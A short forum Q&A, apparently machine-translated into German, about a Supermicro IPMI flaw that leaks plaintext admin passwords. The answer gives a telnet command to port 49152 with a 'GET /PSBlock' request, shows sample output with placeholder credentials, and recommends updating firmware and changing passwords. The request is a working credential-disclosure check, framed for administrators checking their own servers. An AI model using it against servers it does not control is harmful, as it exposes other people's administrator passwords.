Ich habe einige Supermicro-Server mit IPMI ausgeführt, und wie in diesem Blog beschrieben ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) besteht eine kritische Sicherheitsanfälligkeit für Holen Sie sich Klartext-Administratorkennwörter von jedem entfernten Standort.
Wie überprüfe ich, ob mein Server-Motherboard kompromittiert ist?
Antworten:
Telnet einfach mit der IPMI-IP-Adresse in Port 49152 und führt eine bestimmte GET-Anfrage durch. Sie sollten Ihre Benutzer und Passwörter erhalten, wenn Sie kompromittiert sind.
telnet server.example.com 49152
Nachdem die Verbindung GET /PSBlockdie Ergebnisse angefordert und angesehen hat, sollte es ungefähr so aussehen:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Antworten:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Um dieses Problem zu beheben, aktualisieren Sie die IPMI-Firmware auf die neueste Version. Die Firmware ist spezifisch für Ihren IPMI-Controller, daher sollten Sie die auf der Supermicro-Website angegebene Firmware erhalten.
Ändern Sie dann nach dem Aktualisieren der Firmware Ihre Passwörter .